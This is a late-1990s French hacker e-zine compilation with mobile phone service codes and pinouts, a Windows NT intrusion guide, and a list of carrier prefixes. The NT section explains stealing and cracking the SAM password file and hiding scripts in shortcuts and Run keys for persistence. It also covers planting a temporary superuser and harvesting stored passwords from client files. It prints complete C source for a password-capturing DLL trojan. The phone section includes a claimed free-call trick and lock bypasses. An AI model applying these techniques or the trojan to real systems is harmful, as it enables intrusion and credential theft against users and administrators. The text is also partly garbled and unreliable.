>*<<*<*> YES v�rifier les chaines de texte du t�l�phone (1) >*<<*<*>> YES v�rifier les chaines de texte du t�l�phone (n) Le menu de v�rouillage du fournisseur d'acc�s (Service Provider (SP)) est utilis� pour v�rouiller le t�l�phone sur la carte SIM de votre SP. pressez 'Yes'. Pour activer / d�sactiver ce verrou. ainsi vous instaurez la place du menu en donnant le numero de la place du menu comme ca: si votre celle inscrit "Store->2". Codes *#06# pour obtenir le num�ro IMEI (International Mobile Equipment Identity) *#0000# pour remettre le language en Anglais >*<<*<* pour obtenir les informations internes au t�l�phone CXC125065 . Un d�v�rouillage par acces direct dans l'EEPROM sera n�cessaire. Le t�l�phone peut cependant accepter une autre carte SIM du m�me SP. ____________________________ Ericsson GH688.Num�ro de s�rie PRG 970715 1515 . Attention : en faisant ceci.

Si a "0". Comment communiquer avec le telephone ? ? La ligne serie dialogue en mode 9600 n 8 1. aller dans le menu "RESEAUX". . 11: entr�e BF. Cette alimentation branch�e sans la pr�sence d'une batterie. Quand le t�l�phone est allum�.9 = GND (analogic) 10 = ? 11 = BF in 12 = BF out Courte description 1: alimentation externe pour charger la batterie. cette broche est � "0". Astuces Raccourci pour le menu des derniers numeros composes : Ce menu est accessible en pressant la touche YES. Quand le t�l�phone est allum�. est a "0". Nom complet du reseau : Pour afficher le nom complet du reseau. 6: Mode test. 12: Sortie BF. et qu'il n'est pas en chargement. 5: Sortie +5V quand le t�l�phone est allum�. Elle parait atenuer le micro et le haut-parleur lorsqu'elle est a "0". ne permettra pas d'utiliser le t�l�phone. allumer le t�l�phone. 2: Entr�e ligne s�rie RS232 niveau TTL (0/5V). Ainsi l'indicateur de batterie s'affiche pendant environ 2 secondes. En general. passe a "1" durant une conversation. Ensuite. eteindre le telephone. presser "*" pour afficher le nom complet du reseau desire. Pratique pour couper l'autoradio par exemple. le micro et le haut-parleur internes sont actives. Lorsque le telephone est eteind.2V avec 600mA au moins. 3: GND digital 4: Sortie ligne s�rie RS232 niveau TTL (0/5V). Normalement a "0". cette broche est � "1". Voltage sugg�r� 7. elle repond aux commandes AIES "at" mais rien de plus. En fait. 8: Si ouvert. mais l'est aussi en pressant "0" puis "#". 10: Cette broche est encore inconnue. Pour basculer en mode test. ceux en externe seront activ�s. le niveau de batterie peut etre affiche pendant une periode tres courte en pressant tres rapidement la touche "NO". la ligne serie marche � 115200 au lieu de 9600 en mode normal. 9: GND analogic. 7: Mute. et usiliser "SELECTION" ou "LISTE" pour afficher les reseaux disponibles. Dans ce mode. mettre la broche a "1" (+5V).

Composer le num�ro et presser "YES".Version du Soft 2eme Ligne . est une carte SIM qui possede un certain nombre de credits. Losque le telephone a fini sa recherche. Derniere date de reparation *3370# pour avoir une meilleure qualite d' appel [ce qui diminue la duree de vie de la batterie] #3370# pour enlever cette option Note: apres avoir presse ces touches.Type de cell. Pour avoir plus d' infos sur le cell (numero de serie): *#92702689# 1er Ecran . La liste complete des operateurs s'affiche.Date de sortie du Software 3eme Ligne . mais la carte SIM n'enregistre pas l'appel (selon les pays). SP = Spare (always "0") __________ Nokia 6110 Pour voir le numero IMEI: *#06# Pour voir la version du Software: *#0000# 1ere Ligne . est de retirer la batterie. On peut encore converser au telephone. IMEI (International Mobile Equipment Identity): XXXXXX-XX-XXXXXX-X TAC FAC SNR SP TAC = Type Approval Code (first 2 digits = country code of the approval-country ) FAC = Final Assembly Code (01. A la fin de l'appel. *4720# pour activer une qualite moyenne sur le GSM [la qualite baisse. Utiliser "<" et ">" pour se deplacer dans la liste.02 = AEG) (10 Nokia) (41. tout comme une telecarte normale. presser "<" puis deux fois "YES". Date d' achat 4eme Ecran .Pour afficher la liste complete des operateurs acceptes par votre telephone.44 Siemens) (51 Sony. Date de fabrication du cell 2eme Ecran . Une fois que le message "CONNECTE" s'affiche : Presser "CLR" puis "0" puis "#" puis deux fois "NO" pour eteindre le telephone. # de Serie. et uniquement dans certains pays. .Siemens. mais la duree de la batterie augmente de 30%] #4720# pour desactiver cette option. Appels gratuits : Ce procede ne semble marcher qu'avec les cartes prepayees. La carte prepayee. le cell se reinitialisera avec l' option choisie. IMEI 3eme Ecran . aller dans la fonction "LISTE" du menu "RESEAUX". le seul moyen de remettre le telephone en etat normal.Ericsson) SNR = Serial Nr.

et diminuer la vie de la batterie. NHE-8 Type de phone. tapez # 4 7 2 0 #). entrez: * # 9 2 7 0 2 6 8 9 # Vous verrez la date de fabrication.11 Version du Software. en attendant d' avoir le choix du profil. la derniere date de reparation. 9268 (OK) : Montre le numero de serie. Pour ameliorer la kalite d' appel. Pour trouver rapidement et composer un numero. 24-09-97 Date de sortie du software. puis maintenez la touche <on/off> enfoncee. le type de cell. 37832 (OK) : Pour etablir la date de vente (a n' utiliser k' une seule fois). Pour diminuer la kalite d' appel et augmenter la duree de vie de la batterie. Pour verifier si l' horloge SIM peut etre stoppee: *#746025625# Pour initailiser la configuration: *#7780# Pinouts Desktop Charger----------------------| | | | | CHARGER--| + TOP OF PHONE - V V 1 2 3 4 5 6 V (o) | | [= = = = = =] | | 7 8 9 10 11 12 . tapez * 4 7 2 0 # (pour l' enlever. le numero de serie. Un code va vous etre demande: 6232 (OK) : Montre l' annee et le mois de fabrique.59 (01-06-98) Puis vous verrez: la version du soft.__________ NOKIA 5110 Pour voir le numero d' IMEI: * # 0 6 # Pour voir la version du soft: * # 0 0 0 0 # Derniere version: V. pressez <on/off> deux fois rapidement. pressez 5). Pour avoir + d' infos a propos du cell.32 Tapez *#92702689# . Pour changer rapidement le profil du cell. 7332 (OK) : Montre la date de la derniere reparation 7832 (OK) : Montre la date de vente du cell. et le numero IMEI. 87267 (OK) : Pour confirmer le transfert. La derniere version connue est: V 7. 4. __________ Nokia 3110 Pour voir le numero d' IMEI: * # 0 6 # Pour voir la version du soft:*#3110# Par exemple: V 07. sa date de sortie. pressez <arrow down> puis la premiere lettre du nom (pour john. entrez * 3 3 7 0 # (pour l' enlever. tapez # 3 3 7 0 #).

______________ Panasonic G500 Pour voir le numero d' IMEI: * # 0 6 # PINOUTS . et le valider? Pour desactiver la RBS: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok] Cela ne fonctionnera k' avec certaines versions de softwares. Entrez : + puis 'Memory' puis 'Find' ou + et la fleche du bas Resultat : Vous apercevez les appels mankes. 6200 (Flare). Multipliez ce numero par 550. 7500. un nouveau cell est selectionne. C' est la qualite du signal. Pressez 'Menu'. xxx etant un numero. entrez *#31#[SEND] Pour permettre de voir les sites de cells. pressez [MENU] tant ke 'C1' apparait. Si ca reste negatif pendant plus de 5 secondes. pressez [OK]. pressez [OK]. selectionnez 'Active Cell'. en metres. 7500.pressez [MENU] tant ke 'Eng Field Option' apparait. 8400 & 8700 *#06# donne l' IMEI pour les 8700. pressez [OK]. entrez *#30#[SEND] . 8200.______________________ Nokia 2110i/2110e/9000 IMEI Pour voir le numero d' IMEI: * # 0 6 # Pour mettre en marche l' id. [MENU] 4 9 1 Pour avoir la version du software sur les 2110e / 2110i. selectionnez 'Active Cell'. Qualite du signal . mais pas pour les 6200.31 Version du soft 06-01-96 Date de fabrication NHE-4 modele GE8 = 9000? Kelkes raccourcis pour les 2110i ! Entrez : * puis 'Memory' puis 'Find' ou * et la fleche du bas Resultat : Vous apercevez les appels recus.Faites un appel. puis le bouton 'vert' vous permet de transmettre les codes DTMF. __________________________________________________________ Motorola d460. pressez [OK]. pressez [MENU] tant ke 'Eng Field Option' apparait. Lorsque ca repond. 8200 Pour activer la RBS (Radio Base Station): ('pause' signifie ke la touche * est pressee en attendant ke la fenetre apparaisse) [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok] Vous devez maintenant presser [MENU] et naviguer jusk'a la fonction 'Eng Field Options'. 2500. Pour le call-blocking. pressez [MENU] tant ke 'Time Adv xxx' apparait. et le resultat est la distance entre votre cell et la RBS. entrez *#170602112302# Pour les versions plus recentes: *#682371158412125# The phone should display something similar to this: V 5. Utilisation de la RBS: Distance a la station .

Reserved L=FLASH WRITE ENABLE 14 .8kbps) 7 ..External_Power <.HF_ON (L=ON) -> L=H/F ON 5 .Logic_Power -> H=HANDSET ON 16 . CREAT. MMI.L=H/F MODE 13 .Ignition <. entrez *#8377*# Le resultat donnera kelke chose du genre: Version : 0916 . BS.Audio_Ground 4 .RX_Audio 11 . *#2255*# active et desactive le mode "DEBUG CALL".Serial_Up <.EEPROM : 00000000-00 .TDA : 2445 .KISS : 0502 SIM-LCK .Serial_Down -> UART down 8 .EEPROM : 00000000-00 .AOP_Sense <. comme le nom: *#7378*# .UART up (9600. RR.Selection de l' adaptateur DATA 6 .TDA : 2445 . *#2558*# affiche le temps en jours.ou pour d autres versions de soft: *#5644*# Resultat: Version : 09162205 .1 .KISS : 0502 SIM-LCK Pinouts pour Fizz et Spark 1 GROUND 2 GROUND 3 HANDS FREE ON/OFF 4 MUTE 5 TX 6 RX 7 RTS 8 REPROGRAMMING 9 ON HOOK CHARGER (a peu pres 13V? a 14V) 10 AUX MIC 11 AUX SPEAKER 12 GROUND _____________ Philips GENIE IMEI: *#06# *#2254*# est le status de l' enregistre: C.PAON -> Power Amplifier Control Signal _________________ Philips PR 747/II Ce sont les memes codes que pour le Nokia 6110 ____________ Philips FIZZ IMEI: *#06# Lock Code: *#1234# Pour avoir la version du software.33.Radio_Mute -> L=MUTE 12 .Puissance pour le rechargement 9 .HF_Sense <.TX_Audio 3 .H=ON 15 . heures et minutes du temps depuis lekel vous etes connecte au reseau GSM Pour forcer une reconnection au reseau: *#2562*# Pour voir et modifier les codes de securite du telephone: *#7489*# Pour voir des infos sur votre carte SIm.Ground 10 .Ground 2 .

4 12.4 1.8 25. Indicateurs du mode Test: (* = seulement dispo lors d' un appel) CH Numero du canal RX Force du signal (dB) N NCC (Color Code) B BCC (Color Code) CI Cell ID (en Hex) C1+ temps avant ke le cell force la connection. Sony CM DX 100 MONITOR MODE Idem ke pour les S1/S3.01) et MSC TXPWR Puissance de transmission (dB) RXAM Force du signal recu.2 6.05 . et pressez [OK].Pour avoir des infos sur le SIM lock. Pour activer ce mode.2 .2 0. Presser le bouton droit d' affichage lorske vous etes en monitor mode permet de montrer une liste de 6 cells ayant les plus forts signaux.5 . Init et Flags: *#3377*# Pour activer et desactiver le sleep mode: *#7693*# Pour avoir des infos sur le sleep mode: *#8463*# _____________________ Siemens S1/S3:comfort MONITOR MODE Les series Siemens S1/S3 ont un mode moniteur ki peut etre active directement par le clavier.03 . Pressez [8] (ca peut etre le [7] sur certains cells). (see RX and RXAM) LAI Location Area Identity. Pressez [Menu].6 . vous devez entrer le code special d' acces programme dans le telephone.08 .8 0. TS* Temps de coupure TA* Distance a la Tour en Km X 2 PL* Niveau de Puissance Tableau de puissance PL: 5 6 7 8 9 10 11 12 13 14 15 dB: 33 31 29 27 25 23 21 19 17 15 13 Watts: 2 1.6 3. Vous devriez voir votre IMEI Pressez la touche en haut a gauche du menu.3 . sauf k' il faut presser [7] au lieu de [8]. Protocole: Allumez le telephone Entrez le code d' acces du PIN. 7684666 Touche de raccrochage. Montre le code Id du reseau (42F010 = 240. Pressez [9].02 LF* C1 valeur avec transmission continue de la Tour LS* C1 valeur avec transmission discontinue de la Tour QF* Taux d' erreur avec transmission continue de la Tour QS* Taux d' erreur avec transmission discontinue de la Tour Tableau du taux d' erreur (BER= Bit Error Rate) QF/QS register: 0 1 2 3 4 5 6 7 % of bit sent: 0.8 .3 .13 . ____________________________________ Siemens S4/S4 Power .

1 Qui a dit que NetBios �tait pour les lames ? 6.2 Comment cracker les mots de passe ? 4.LNK) 5.�'�`�.Net Computer .�_)`�.2 R�cup�ration de donn�es pour une attaque sur NT 6.1 Ou sont-ils ? 3.��`�. Les commandes NET 4.6 ( cyberjunk ( (_�.2 Les raccourcies (._.com/cybjunk] To: Cryptel E-Zine Cc: Internet =) -------------------------------------------------------------------- 1.3 NAT [NetBios Auditing Tool] 7.3 Hack de NT en local 3._.4 Quelque id�es de conception 6.�'��)�.Net User 4.(�`'�._.Net Continue/Pause . Les r�seaux Windows NT 2.Net Group .Net Start/Stop .�'��) ) Windows NT.com | www.��`�.��(_�.�_.Net File .3 Ou le mettre pour qu'il se lance au demmarrage ? 5.�_)`'�.��`�.Net Use ._.Net Session 4.��`�._�._. Les chevaux de troie 5.* 3.multimania.(�`'�.Net Share . Les fichiers SAM. les bases #1 ) 2.Net Accounts .�'�(_�. Introduction 2.1 Gestion des utilisateurs .1 Les protocoles 3.Net Config Server . Failles de s�curit� dans un domaine Windows NT [ Rem: Cette partie ne traite pas le m�thode Netbios ] 6.�'��).Net View 5.��`'�.2 Informations syst�me .�(�`'�.� �. Fin .��`�.�_) From: Cyberjunk [Snipper@Hotmail._.Net Localgroup .�'��`'�.1 FPNWCLNT.��`�.Net Config .DLL 5.3 Ressources r�seau . Windows 95/98.

------------------+------------------------------------------------------------- + DLC | Le protocole Data Link Control s'appuie sur le standart | 802. Le probl�me de celui ce c'est qu'il est en utilisation permanente par le syst�me.5x.. La triste v�rit� est l� . il existe de petit executable qui se chargeront pour vous de pouvoir vous autoriser a manipuler le fichier cible . que vous risquez | de le croiser de temps � autre. Windows NT s'impose dans le monde (impitoyable =) ) des serveurs..* -------------------------------------------------------------------- 3. ------------------+------------------------------------------------------------- + TCP/IP | Je pense que c'est la peine de m'attarder la dessus. il est en fran�ais. ------------------+------------------------------------------------------------- 3. Tous ca pour dire. Il devrait vous permettre d'aller un plus loin que le NetBios. ) ------------------+------------------------------------------------------------- + NWlink | A partir de NT 3. accepte plusieurs protocoles et les fait fonctionner c�te � c�te.. WINNTsystem32ConfigSam.h etc . J'en sais pas plus. mais il est oblig� qu'il ressemble � certain autre vu le nombre d'article qui parle d�j� de NT. Donc il vous est impossible de l'ouvrir. ------------------+------------------------------------------------------------- + IPX/SPX | R�seaux utilis�s pour communiquer avec NetWare (Novell) | sachant que NT n'a pas besoin de novell pour un LAN.2 et est utilis� entre NT et les calculateurs Mainframes | ou des composants sp�cifiques commme les cartes JetDirect(HP) | ou markVision (LexMark).1 Ou sont ils ? En fait sur un syst�me NT Server.. Les r�seaux Windows NT -------------------------------------------------------------------- 2.. au temps du MsDos. Les fichiers SAM. Il comporte moins de 20 | commandes. ou de comprendre des r�seaux Microsoft dans votre universit� par exemple ou encore de bien pr�parer la future doc de Rhino 9..1 Les protocoles Windows NT commme la pluspart des OS R�seaux. developp� par | Microsoft. Introduction -------------------------------------------------------------------- Tout d'abord je tiens � pr�ciser que ce texte n'est pas un RIP. 2. les mots de passe sont enregistr�s dans un fichier appeller Sam. et a mon avis il est destin� � ceux qui ont envi de se mettre � jour. ------------------+------------------------------------------------------------- + NetBios/NetBeui | C'est le plus simple de tous les protocoles. NT War Doc si vous n'�tes pas familier avec ce syst�me. ( Cf wsnetbs. A quoi sert -il ? ou A qui est-il destin� alors ? D�j�. et de le copier.-------------------------------------------------------------------- 1. Pour remedier a ce probleme.

.. ---- 3.1 Gestion des utilisateurs Net Accounts ============ Si vous taper cette commande sans param�tre vous obtenez les infos relatifs au mot de passe. j'en suis s�r ! 4. Par contre il faut savoir qu'il existe un autre Sam sur WINNTRepairsam.) L'interet secondaire de ces commandes. vous pouvez l'utiliser pendant 1 semaine. nous avons Linux/Nt en multiboot. Choisissez votre arme =) 4. .phrack.com/phrack). Mais bon. dur�e de validit�. ---- Ces fichiers (l'un ou l'autre) deviennet donc la cible d'une attaque sur NT.com) sont auteur d'un tres beau shareware appeller L0phtcrack.. est de pouvoir ecrire des script int�ressant . monter la partition NTFS avec 'ntfsdos.3 Comment Cracker les mot de passe ? L0pht (www. Partage etc .2600. il n'est pas en utilisation permanente. de vous faire voir ce qui est a votre port�e depuis une station de travail. Rem: A l'inverse du premier. Rem: Il faut �tre root pour utiliser la commande mount. L'inter�t du paragraphe suivant n'est pas de re-ecrire l'aide .. 3. Une autre... peut se faire depuis Linux. Les commandes NET -------------------------------------------------------------------- Sous NT. nombre de caract�res . www. =) Mais en fait.exe par exemple).. avoir les droits d'acc�s totals sur la machines. Pour ce qui est du shareware.(samdump._ Celui-ci est cr�er a l'installation de windows et contient donc le password administrateur. et bien souvent sur tout le r�seau =) . et de lancer du brute force dessus.. il y a aussi un programme en C dispo dans Phrack Issue 50.com (www. comment obtenir des informations sur les utilisateurs ou mot de passe par exemple ou encore comment faire des manips interessantes par rapport � la config r�seaux (Domaines. pratiquement tout peut se �tre param�tr� en utilisant ces commandes.exe' et aller chercher le fichier de mot de passe. qui permet d'ouvrir un Sam.. On peut donc monter la partition Ntfs et aller chercher le fichier. car l'important c'est d'avoir l'admin pour des raisons simples.l0pht.2 Hack de NT en local Une technique tres simple consiste a booter avec une disquette dos. je vou cacherez pas que le crack est dispo sur astalavista =) Toute fois.. Comme c'est le cas dans mon univ.. =) En rapport avec les chevaux de trois !!! Mais vous l'aviez d�ja compris. bas� sur le m�me principe. Assez pratique la version actuelle contient m�me le samdump int�gr�.

-------------------------------- +--------------------------------------------------------- /MINPWLEN:[longueur] | Taille du mot de passe -------------------------------- +--------------------------------------------------------- /MAXPWAGE:[jour|unlimited] | Dur�e en jour de la validit� des mot de passe -------------------------------- +--------------------------------------------------------- /MINPWAGE:[jours] | Au bout de combien de jour le pass doit etre changer -------------------------------- +--------------------------------------------------------- /UNIQUEPW:[nombre] | Repete le MEME mot de passe. Net User ======== Permet de g�rer les comptes utilisateurs sur le serveur. -------------------------------- +--------------------------------------------------------- /ADD | Ajoute un groupe -------------------------------- +--------------------------------------------------------- /DELETE | Supprime un groupe -------------------------------- +--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local. M�me si vous �tes sur un station de travail. . -------------------------------- +--------------------------------------------------------- Net Localgroup ============== M�me chose sur la machine locale. cette commmande n'agit que sur le serveur. -------------------------------- +--------------------------------------------------------- Net Group ========= Affcihe les noms de groupe sur le serveur.-------------------------------- +--------------------------------------------------------- /FORCELOGOFF:[minutes|NO] | Indique en minute la dur�e d'une session usr sur le | serveur. Valeur max 8 -------------------------------- +--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local. Par d�faut ep�che une d�connexion forc�e.

Exemple: NET CONFIG [PARAMETRE] -------------------------------- +--------------------------------------------------------- SERVER | Renvoie des infos sur la config du server -------------------------------- +--------------------------------------------------------- WORKSTATION | idem pour la station de travail -------------------------------- +--------------------------------------------------------- .2 Informations syst�me Net Computer ============ Ajouter un ordinateur dans un domaine. -------------------------------- +--------------------------------------------------------- /ACTIVE:[YES|NO] | Active ou d�sactive un compte user -------------------------------- +--------------------------------------------------------- /EXPIRES:[date|NEVER] | Faire d�sactiver un user a une date sp�cifique -------------------------------- +--------------------------------------------------------- /HOMEDIR:chemin | Chemin du dossier de basede l'usr -------------------------------- +--------------------------------------------------------- 4. Exepmle: NET COMPUTER \ip_de_l_ordi [PARAMATRES] -------------------------------- +--------------------------------------------------------- /ADD | Ajoute un ordi -------------------------------- +--------------------------------------------------------- /DEL | Supprime un ordi -------------------------------- +--------------------------------------------------------- Net Config ========== Renvois des infos d'une machine.Exemple: net user login_user mot_de_pass [POUR LA SUITE VOIR LES PARAMS SUIVANTS] -------------------------------- +--------------------------------------------------------- /ADD | Ajoute un user -------------------------------- +--------------------------------------------------------- /DELETE | Supprime un user -------------------------------- +--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local.

Exemple: NET CONFIG SERVER [PARAMETRE] -------------------------------- +--------------------------------------------------------- /AUTODISCONNECT:m | Dur�e de la d�connexion automatique si inactivit� -------------------------------- +--------------------------------------------------------- /HIDDEN | Permet de cacher un ordi lorsque l'on demande d'afficher | la liste des serveurs. cette commande permet de ferme les fichiers partag� et Sans option elle renvoi la liste des fichiers ouverts sur le serveur avec leurs num�ro. Exemple: NET FILE [num�ro|/DELETE] -------------------------------- +--------------------------------------------------------- /CLOSE | Ferme le fichier -------------------------------- +--------------------------------------------------------- Net Share ========= .3 Ressources r�seau Net Continue/Pause ================== Suspend ou active un service.Net Config Server ================= Permet de configurer de fa�on particuli�re les serveur. -------------------------------- +--------------------------------------------------------- Net Session =========== Appelle et termine les sessions d'un ordi du r�seaux. Exemple: NET PAUSE/CONTINUE [service] Net File ======== Disponible que sur les serveurs. Exemple: NET SESSION \ip_ordi [PARAMETRE] -------------------------------- +--------------------------------------------------------- /DELETE | Termine la connexion sur un autre ordi -------------------------------- +--------------------------------------------------------- 4.

) -------------------------------- +--------------------------------------------------------- /HOME | Relie l'utilisateur a son dossier d'origine (HOME ..) -------------------------------- +--------------------------------------------------------- /DELETE | Terminer une connexion -------------------------------- +--------------------------------------------------------- /PERSISTENT [YES|NO] | R�tablir a la prochaine ouverture ? -------------------------------- +--------------------------------------------------------- Net View ======== Affcihe les ressources partag�es. Sans option elle renvoie la liste des ressources partag�es d'un ordinateu avce quelques bien sp�cifique. Exemple: NET USE \Ip_de_l_ordi [mot_de_passe] [PARAMETRES] -------------------------------- +--------------------------------------------------------- /USER user | Nom de l'utilisateur avec lequel la connexion sera | �tablie (login. Sans option. Exemple: NET SHARE nom_de_partage=chemin [PARAMETRES] -------------------------------- +--------------------------------------------------------- /USERS:nombre | Nbe de user ouvant y aller en m�me temps -------------------------------- +--------------------------------------------------------- /DELETE | Arrette le partage -------------------------------- +--------------------------------------------------------- Net Start ========= Arrette ou demarre un service.. Exemple: NET START/STOP [service] Net Use ======= Elle permet de se connecter a un ordianteur distant. Exemple: NET VIEW \ip-de_l_ordi 5.. elle renvoient des informations sur les ressources partag�es.La commande NET SHARE permet de consulter et de modifier les partages d'un serveur.. Les chevaux de troie -------------------------------------------------------------------- .

199). WriteFile(fh. sprintf(buf. buf1). user->len). "InitializeChangeNotify started ". buf. FILE_SHARE_READ|FILE_SHARE_WRITE. :) ------------. passwd->buff. fh = CreateFile("C:\temp\pwdchange. ULONG rid. strlen(buf). 0).h> struct UNI_STRING { USHORT len.h> #include <stdlib. WriteFile(fh. WCHAR *buff. DWORD len. GENERIC_WRITE. USHORT maxlen. sprintf(buf.5.. struct UNI_STRING *passwd) { DWORD wrote. char buf[512]. 0). wbuf[len] = 0. Au cas ou v �tes plus chanceux que moi. len = user->len/sizeof(WCHAR). len = passwd->len/sizeof(WCHAR). &wrote. return TRUE. char buf1[200]. 199). WriteFile(fh. memcpy(wbuf.h> #include <stdio. FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH.1 FPNWCLNT. static HANDLE fh. user->buff. BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote. Le r�sultat est mis dans un fchier sur emp. wbuf[len] = 0.DLL [Trouver dans le MHD de Rhino9 ] Cette Dll permet d'obtenir des noms d'utilisateurs et des mots de passe si le r�pertoire WinNTSystem32 est en mode Lecture et Ecriture. buf1). "RID = %x ".cut -------------- #include <windows. "User = %s : ". strlen(buf). wcstombs(buf1. &wrote. wcstombs(buf1. buf. wbuf. . 0). memcpy(wbuf. WCHAR wbuf[200]. wbuf. 0). 31. 0. } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user. passwd->len). rid). sprintf(buf. Pour ma part je n'ai jammais trouver de tel syst�me pour l'instant mais voila quand m�me la source .out". "Password = %s : ". }. &wrote. CREATE_ALWAYS.

Si vous avez les droits. sauf peut-�tre que le TEMP est tres souvent en acc�s complet pour tous les utilsateurs. strlen(buf). pourait ce passer sur serveur partag� ou tout le monde met ce qu'il veut. Points int�ressants: --------------------- N'oubliez pas que si vous n'avez pas les droits pour aller dans des r�pertoires cl� du syst�me.C:WinNTProfilesDefault UserStart MenuProgramsStartUp ~ US . Enfin bref. vous pouvez donc pratiquement configurer ou reconfiguer tous les param�tres r�seaux et donc par cons�quences obtenir pratiquement ce que vous voulez d'un utilisateur. certain eux l'ont. Admettons.4 Quelques id�es deconception: Gr�ce au commande NET.Bat (Ou un .3 Ou le mettre pour qu'il se lance au d�mmarage ? Pour faire ex�cuter une commande au d�marrage vous avez le choix entre le menu d�marrer ou la base de registre.. Puis taper le chemin de votre Script. Je m'explique =) Vous avez chez vous pr�par� un .. Il n'y pas de r�gle en g�n�ral. qui Partage le repertoire de celui qui l'execute.Reg) en jouant avec les commandes NET. &wrote. Assez fr�quent dans les universit�s pour mettre en comun des ressources. buf. } ------------. de toute fa�on je vous je vous fais confiance pour trouver ce qu'il faut. ou vous pourriez modifer les raccourcis Microsoft Office.. 5.LNK) Le grand inter�t de ces fichiers c'est que si vous pouvez les modifer et glisser un de vos gentils script � l'interieur. et de toute fa�on ca depend extremement du server.lnk . Une autre application. Les r�pertoire suivant corresponde au Menu D�mmarrer : . Ajouter Ch�ines. WriteFile(fh. 0). rien ne vous emp�che de lancer un script qui partagera le repertoire HOME de l'utilisateur et qui apres qui lance wordpad. 5. arrang� vous donc qu'il lance votre script et qu'il facent ce que vous vouliez ou carrement qu'il vous donne les droits =) Un autre exepmle serait de faire ajouter un Super-utilsateur qui disparaitra au bout de 1 jour par exepmle.C:WinNTProfilesDefault UserMenu D�marrerProgrammesD�marrage ~ FR Sinon vous pouvez aussi le placer dans la base de registre: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Faites.cut -------------- 4.2 Les raccourcies (.lnk. return 0L. que sur le bureau commun aux utilisateurs traine un wordpad. Il Pourrait trainer par la un Pussy. .

en passant par des machines 95 ou 98 acc�ssible NetBios. ramassez tout ce qui tourne autour des utilisateurs. Windows 95/98. cela vous constitue un bon petit dicotionnaire pour NAT. Une fois des mots de passe trouv�s. je vous garantie qu'il marche encore tres bien (Surtout chez les petits ISP locaux). Failles de s�curit� dans un domaine Windows NT -------------------------------------------------------------------- Cette parti ne re-explique pas la methode NetBios mais � pour objectif de vous montrer quelques techniques d'attaques sur un serveur NT. [CLAIR] .pmail.ws_ftp.etc .ini ~ regarder la configuration du proxy.. par fois c'est le m�me que le password de login.2 R�cup�ration de donn�es pour une attaque sur NT Notre objectif reste toujours un serveur NT.. NAT.. Bonne chance � tous ! Le savoir n�est pas un crime ni les travaux pratiques.eudora. un fichier contenant les noms d'utilisateurs et l'autres les mots de passes. Malgres le fait que ce proc�d� soit tres connus par la pluspart d'entre vous.ini ~ Idem [CRYPTE] . [CRYPTE] .. [CRYPTE] . * Special msg: La parano�a nous sauvera . Disponible sur Rhino9. peuvent ressortir leur attirail. Son instalaltion est simple.. 6. 6. Ce petit utilitaire.1 Qui a dit que NetBios �tait pour les lames ? Je tiens a rappeller pour ce qui avait d�ja mis NetBios au placard..ini ~ Contient des mots de passe de messagerie. et c'est parfois un faille dans un r�seau NT pourtant s�curis�. Fin -------------------------------------------------------------------- Bon voil� c�est fini . 7. . Interface graphique. forte chance pour que ce soit les meme que pour NT.3 NAT [NetBios Auditing Tool] Je pense que la majorit� d'entre vous le connaissent d�j� mais je tenniat � le rappeller. 6. permet de faire du brut force sur des ressources partag�.mirc.. 6.Je vous conseille vraiment d'installer WinNT et de tester vos programmes en Local.pwl ~ Mot de passe de login sous 95. [CRYPTE] . Sur la machine 95.ini ~ Contient des mots de passe sauvgard�s sur acc�s FTP.EXE Disponible sur Technotronic. Have Phun ! .

��`�. Le premier.�'�(_�. Dans de rares cas.�'��`'�._�.�_)`�._.��(_�._. 16XY00 au lieu de 00). a composer avant les 10 chiffres habituels ( a l' international. et FT est alors accessible par le 8. qui correspond a l' operateur de boucle locale auquel l' utilisateur est raccorde.�_)`'�.� �.�'��) ) Prefixes nationaux ) 2.) 1633 | GLOBAL ACCESS 1639 | FIRST TELECOM 1640 | KAT' AQUITAINE 1654 | ESTEL (STRASBOURG) 1655 | WESTERN TELECOM <<<--.��`�.�'�`�.�(�`'�.��`�. vers les mobiles._.��`�.(�`'�. c' est malheureusement FT (pour l' instant . Worldcom ou Colt pour un client directement relie a leur boucle optik.(�`'�. Dans la plupart des cas. a un chiffre (dit " E "). il est possible d' acceder aux operateurs prives grace a des prefixes.) 1656 | PRIMUS 1659 | BELGACOM 1660 | UNIGLOBE 1661 | RSC COM 1670 | GOLDEN LINE 1677 | PHONE SYSTEMS 1678 | WORLDXCHANGE 1682 | KDD 1688 | LDI .�'��).��`�. C' est encore France Telecom qui s' y oppose.ouaish ouaish .)._.��`'�._.��`�. Ils ne sont pas utilisables depuis les cabines. A noter le cas particulier du 0. Liste des prefixes: Prefixe | Operateur ---------------|-------------------------- 2 | SIRIS 4 | TELETEL 5 | OMNICOM 6 | ESPRIT TELECOM 7 | CEGETEL 8 | FRANCE TELECOM 9 | 9 TELECOM 1601 | PROSODIE 1610 | TELEGLOBE 1611 | GEOLINK 1616 | AXS 1617 | INFOTEL 1618 | WORLDCOM 1620 | INTEROUTE 1623 | VIATEL 1626 | A TELECOM (AXIS) 1630 | KERTEL (PINAULT) <<<--.�_.7 ( vatoo ( (_�. ca peut etre Cegetel. Les prefixes sont utilisables pour les appels hors du departement Longue Distance. vers les numeros speciaux ( 3BPQ et 08).�'��)�. est a composer a la place du 0 et a faire suivre des neuf chiffres habituels (a l' international.�_) Depuis le debut de l' annee. E0 au lieu de 00). Le second type de prefixe est compose de 4 chiffres (du type 16XY). Il en existe deux types.mes p'tits cowboyz ._. meme pour 1999.

